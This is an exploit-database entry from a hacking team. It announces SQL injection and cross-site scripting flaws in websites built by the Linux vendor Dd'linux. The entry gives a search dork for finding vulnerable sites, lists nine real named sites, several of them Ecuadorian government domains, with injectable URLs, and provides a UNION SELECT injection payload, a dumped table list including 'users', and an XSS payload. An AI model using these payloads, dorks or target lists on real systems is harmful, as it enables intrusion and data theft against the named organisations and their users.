Dd'Linux - SQL Injection / Cross-Site Scripting Vulnerabilities

2012-10-22T00:00:00
ID 1337DAY-ID-19606
Type zdt
Reporter Taurus Omar
Modified 2012-10-22T00:00:00

Description

Dd'linux provides business solutions and services based on Linux as the main OS.Given the form of licensing which is free software, these solutions do not require the degree of investment in licenses as required by commercial software.Our technical staff has experience since 1996 in the implementation of free software solutions. - Internet and Intranet - Workstations - Audit and Security - Design, installation and configuration of wireless networks Indoor and Outdoor - Configure Cisco routers and networks - Sale of Linux distributions: Fedora Core2, Suse, Debian, etc. ..

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1               ==========================================               1
0               I'm Taurus Omar Member From Inj3ct0r TEAM                1
1               ==========================================               0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
|    Dd'Linux - SQL Injection  / Cross-Site Scripting Vulnerabilities    | 
--------------------------------------------------------------------------
 
+----------------| ABOUT ME |--------------------+
NAME:     TAURUS OMAR                            -
HOME:     ACCESOILEGAL.BLOGSPOT.COM              -
FBOOK:    facebook.com/OMARTAURUS                -
TWITTER:  @taurusomar_                           -
E-MAIL:   omar-taurus[at]dragonsecurity[dot]org  -
E-MAIL:   omar-taurus[at]live[dot]com            -
PWNED:    #ZUUU                                  -
+------------------------------------------------+
 
# Exploit Title: Dd'linux - SQL Injection  / Cross-Site Scripting Vulnerabilities
# Vendor Name: Dd'linux
# Url Vendor: http://www.ddlinux.com/
# Category: WebApps
# Type: php
# Risk:  Critical
# Dork: intext:"Desarrollado por dd'linux"
 
# Example/Sql=> http//site.com/xxxx?id=[sql]
# Example/Xss=> http//site.com/search.php [XSS]


# Sample/Sql 
http://www.avso.com.ec/galeria_foto.php?codigo_album=12%'
http://www.babahoyo.gob.ec/pagina.php?id=6%'
http://david.ddlinux.com/galeria_foto.php?codigo_album=4%'
http://www.coac-sanfra.com/pagina.php?id=1%'
http://www.chibuleo.com/novedad.php?codigo=3%'
http://www.emapa.gob.ec/galeria_foto.php?codigo_album=5%'
http://www.galapagostech.com/index.php?id=1%'
http://www.fmrumba.com/contactenos.php?id=7%'
http://www.bioalimentar.com.ec/avimentos/plan_alimenticio.php?id=1%'

# Comand/Sql/Payload=> UNION ALL SELECT CONCAT(CHAR(58,105,107,113,58),IFNULL(CAST(CHAR(115,80,76,103,105,73,101,82,73,107) AS CHAR),CHAR(32)),CHAR(58,100,113,119,58)), NULL#

# Info => Same Tables and Columns All Vulnerability Site's
+-------------------------+
| agenda                  |
| album                   |
| banner                  |
| banner_ubicacion        |
| contador                |
| imagen                  |
| imagenes_animacion      |
| mails                   |
| mails_paginas           |
| noticia                 |
| opcion                  |
| opcion1                 |
| opcion2                 |
| opciones                |
| opciones1               |
| transparencia_archivo   |
| transparencia_categoria |
| users                   |
| varios                  |
+-------------------------+

# Sample/Xss
http://david.ddlinux.com/buscar.php
http://www.fmrumba.com/buscar.php
http://www.babahoyo.gob.ec/buscar.php

# Comand/Xss/=> "><img src=x onerror=alert("1337");>  

# Vulnerability/Code
<tbody><tr>
<td><input name="busqueda" id="busqueda" value="" size="15" type="text">
<input name="Submit" class="secondaryAction" id="Submit" value="" type="submit"></td>
</tr>
</tbody>

#  0day.today [2018-01-06]  #